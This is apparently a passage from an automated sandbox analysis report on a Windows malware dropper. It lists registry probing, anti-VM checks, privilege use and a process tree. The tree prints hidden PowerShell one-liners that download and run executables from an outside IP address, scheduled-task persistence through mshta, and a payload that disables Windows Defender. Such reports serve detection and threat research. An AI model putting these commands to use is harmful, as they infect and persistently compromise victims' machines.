\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 279d785fdc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1I13Q5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oVpNTUm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2d75d5050b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ff5f338aa7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e46b6a6a31.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5fc62877eb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language db3a906615.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempNNZCTBMACAVASD9W9CX6NSMWIY1YNVNB.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fe4803757b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2e3683.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3S70g.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vxjrl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72b1e5cdf3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a6b1a4cd10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oVpNTUm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c87d00f7d7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 98d83610e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 279d785fdc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language r0S29.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage c3e6079de5.exe -
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 db3a906615.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString db3a906615.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2092 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 10 IoCs
pid Process 3016 taskkill.exe 1568 taskkill.exe 748 taskkill.exe 6924 taskkill.exe 2352 taskkill.exe 4716 taskkill.exe 6236 taskkill.exe 4408 taskkill.exe 5856 taskkill.exe 6072 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133844070106604377" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3112 schtasks.exe 3300 schtasks.exe 3720 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4404 1I13Q5.exe 4404 1I13Q5.exe 3932 skotes.exe 3932 skotes.exe 4280 skotes.exe 4280 skotes.exe 5040 2e3683.exe 5040 2e3683.exe 5040 2e3683.exe 5040 2e3683.exe 5040 2e3683.exe 5040 2e3683.exe 4736 3S70g.exe 4736 3S70g.exe 3812 oVpNTUm.exe 3812 oVpNTUm.exe 2316 powershell.exe 2316 powershell.exe 4992 powershell.exe 4992 powershell.exe 232 TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE 232 TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE 2728 powershell.exe 2728 powershell.exe 2428 powershell.exe 2428 powershell.exe 3812 oVpNTUm.exe 3812 oVpNTUm.exe 232 TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE 232 TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE 3844 vxjrl.exe 3844 vxjrl.exe 3480 powershell.exe 3480 powershell.exe 3536 483d2fa8a0d53818306efeb32d3.exe 3536 483d2fa8a0d53818306efeb32d3.exe 2312 ff5f338aa7.exe 2312 ff5f338aa7.exe 2592 3fd12b8336.exe 2592 3fd12b8336.exe 4300 a6b1a4cd10.exe 4300 a6b1a4cd10.exe 4300 a6b1a4cd10.exe 4300 a6b1a4cd10.exe 4300 a6b1a4cd10.exe 4300 a6b1a4cd10.exe 4612 3omTNLZ.exe 4612 3omTNLZ.exe 4612 3omTNLZ.exe 4612 3omTNLZ.exe 4612 3omTNLZ.exe 4612 3omTNLZ.exe 3848 98d83610e7.exe 3848 98d83610e7.exe 652 skotes.exe 652 skotes.exe 4932 db3a906615.exe 4932 db3a906615.exe 4932 db3a906615.exe 4932 db3a906615.exe 232 fe4803757b.exe 232 fe4803757b.exe 232 fe4803757b.exe 232 fe4803757b.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6196 msedge.exe 6196 msedge.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 4992 powershell.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 232 TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Token: SeDebugPrivilege 3480 powershell.exe Token: SeDebugPrivilege 3848 98d83610e7.exe Token: SeDebugPrivilege 3016 taskkill.exe Token: SeDebugPrivilege 1568 taskkill.exe Token: SeDebugPrivilege 2352 taskkill.exe Token: SeDebugPrivilege 748 taskkill.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeDebugPrivilege 4716 taskkill.exe Token: SeDebugPrivilege 4924 firefox.exe Token: SeDebugPrivilege 4924 firefox.exe Token: SeShutdownPrivilege 6848 chrome.exe Token: SeCreatePagefilePrivilege 6848 chrome.exe Token: SeShutdownPrivilege 6848 chrome.exe Token: SeCreatePagefilePrivilege 6848 chrome.exe Token: SeDebugPrivilege 5860 powershell.exe Token: SeShutdownPrivilege 6848 chrome.exe Token: SeCreatePagefilePrivilege 6848 chrome.exe Token: SeShutdownPrivilege 6848 chrome.exe Token: SeCreatePagefilePrivilege 6848 chrome.exe Token: SeDebugPrivilege 2356 powershell.exe Token: SeShutdownPrivilege 6848 chrome.exe Token: SeCreatePagefilePrivilege 6848 chrome.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeShutdownPrivilege 6848 chrome.exe Token: SeCreatePagefilePrivilege 6848 chrome.exe Token: SeShutdownPrivilege 6848 chrome.exe Token: SeCreatePagefilePrivilege 6848 chrome.exe Token: SeDebugPrivilege 6236 taskkill.exe Token: SeDebugPrivilege 4408 taskkill.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4404 1I13Q5.exe 5108 c3aff24677.exe 5108 c3aff24677.exe 5108 c3aff24677.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1776 e46b6a6a31.exe 1776 e46b6a6a31.exe 1776 e46b6a6a31.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 1016 c3e6079de5.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe 6848 chrome.exe -
Suspicious use of SendNotifyMessage 43 IoCs
pid Process 5108 c3aff24677.exe 5108 c3aff24677.exe 5108 c3aff24677.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1776 e46b6a6a31.exe 1776 e46b6a6a31.exe 1776 e46b6a6a31.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 1016 c3e6079de5.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 4924 firefox.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 1016 c3e6079de5.exe 3444 279d785fdc.exe 3444 279d785fdc.exe 3444 279d785fdc.exe 3444 279d785fdc.exe 3444 279d785fdc.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4924 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3832 wrote to memory of 2248 3832 52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe 86 PID 3832 wrote to memory of 2248 3832 52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe 86 PID 3832 wrote to memory of 2248 3832 52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe 86 PID 2248 wrote to memory of 4404 2248 r0S29.exe 87 PID 2248 wrote to memory of 4404 2248 r0S29.exe 87 PID 2248 wrote to memory of 4404 2248 r0S29.exe 87 PID 4404 wrote to memory of 3932 4404 1I13Q5.exe 88 PID 4404 wrote to memory of 3932 4404 1I13Q5.exe 88 PID 4404 wrote to memory of 3932 4404 1I13Q5.exe 88 PID 2248 wrote to memory of 5040 2248 r0S29.exe 90 PID 2248 wrote to memory of 5040 2248 r0S29.exe 90 PID 2248 wrote to memory of 5040 2248 r0S29.exe 90 PID 3832 wrote to memory of 4736 3832 52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe 92 PID 3832 wrote to memory of 4736 3832 52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe 92 PID 3832 wrote to memory of 4736 3832 52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe 92 PID 3932 wrote to memory of 3812 3932 skotes.exe 93 PID 3932 wrote to memory of 3812 3932 skotes.exe 93 PID 3932 wrote to memory of 3812 3932 skotes.exe 93 PID 3932 wrote to memory of 5108 3932 skotes.exe 94 PID 3932 wrote to memory of 5108 3932 skotes.exe 94 PID 3932 wrote to memory of 5108 3932 skotes.exe 94 PID 5108 wrote to memory of 3616 5108 c3aff24677.exe 95 PID 5108 wrote to memory of 3616 5108 c3aff24677.exe 95 PID 5108 wrote to memory of 3616 5108 c3aff24677.exe 95 PID 5108 wrote to memory of 608 5108 c3aff24677.exe 96 PID 5108 wrote to memory of 608 5108 c3aff24677.exe 96 PID 5108 wrote to memory of 608 5108 c3aff24677.exe 96 PID 3616 wrote to memory of 3112 3616 cmd.exe 98 PID 3616 wrote to memory of 3112 3616 cmd.exe 98 PID 3616 wrote to memory of 3112 3616 cmd.exe 98 PID 608 wrote to memory of 2316 608 mshta.exe 99 PID 608 wrote to memory of 2316 608 mshta.exe 99 PID 608 wrote to memory of 2316 608 mshta.exe 99 PID 3932 wrote to memory of 4776 3932 skotes.exe 101 PID 3932 wrote to memory of 4776 3932 skotes.exe 101 PID 3932 wrote to memory of 4776 3932 skotes.exe 101 PID 4776 wrote to memory of 2828 4776 cmd.exe 103 PID 4776 wrote to memory of 2828 4776 cmd.exe 103 PID 4776 wrote to memory of 2828 4776 cmd.exe 103 PID 2828 wrote to memory of 2092 2828 cmd.exe 105 PID 2828 wrote to memory of 2092 2828 cmd.exe 105 PID 2828 wrote to memory of 2092 2828 cmd.exe 105 PID 2828 wrote to memory of 3336 2828 cmd.exe 106 PID 2828 wrote to memory of 3336 2828 cmd.exe 106 PID 2828 wrote to memory of 3336 2828 cmd.exe 106 PID 3336 wrote to memory of 4992 3336 cmd.exe 107 PID 3336 wrote to memory of 4992 3336 cmd.exe 107 PID 3336 wrote to memory of 4992 3336 cmd.exe 107 PID 2316 wrote to memory of 232 2316 powershell.exe 108 PID 2316 wrote to memory of 232 2316 powershell.exe 108 PID 2316 wrote to memory of 232 2316 powershell.exe 108 PID 3932 wrote to memory of 220 3932 skotes.exe 109 PID 3932 wrote to memory of 220 3932 skotes.exe 109 PID 3932 wrote to memory of 220 3932 skotes.exe 109 PID 2828 wrote to memory of 2472 2828 cmd.exe 110 PID 2828 wrote to memory of 2472 2828 cmd.exe 110 PID 2828 wrote to memory of 2472 2828 cmd.exe 110 PID 2472 wrote to memory of 2728 2472 cmd.exe 111 PID 2472 wrote to memory of 2728 2472 cmd.exe 111 PID 2472 wrote to memory of 2728 2472 cmd.exe 111 PID 2828 wrote to memory of 1772 2828 cmd.exe 112 PID 2828 wrote to memory of 1772 2828 cmd.exe 112 PID 2828 wrote to memory of 1772 2828 cmd.exe 112 PID 1772 wrote to memory of 2428 1772 cmd.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe"C:\Users\Admin\AppData\Local\Temp\52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\r0S29.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\r0S29.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1I13Q5.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1I13Q5.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3812
-
-
C:\Users\Admin\AppData\Local\Temp\1086592101\c3aff24677.exe"C:\Users\Admin\AppData\Local\Temp\1086592101\c3aff24677.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn YWCjbmaiCMh /tr "mshta C:\Users\Admin\AppData\Local\Temp\u4waN3rk4.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn YWCjbmaiCMh /tr "mshta C:\Users\Admin\AppData\Local\Temp\u4waN3rk4.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3112
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\u4waN3rk4.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'U0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Users\Admin\AppData\Local\TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE"C:\Users\Admin\AppData\Local\TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE"8⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:232
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1086593021\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086593021\am_no.cmd" any_word6⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "IJ70fmaM0kz" /tr "mshta \"C:\Temp\6xRZ7uby5.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3300
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\6xRZ7uby5.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3480 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3536
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086616001\c87d00f7d7.exe"C:\Users\Admin\AppData\Local\Temp\1086616001\c87d00f7d7.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:220
-
-
C:\Users\Admin\AppData\Local\Temp\1086617001\72b1e5cdf3.exe"C:\Users\Admin\AppData\Local\Temp\1086617001\72b1e5cdf3.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3376 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- System Location Discovery: System Language Discovery
PID:3300
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086618001\ff5f338aa7.exe"C:\Users\Admin\AppData\Local\Temp\1086618001\ff5f338aa7.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2312 -
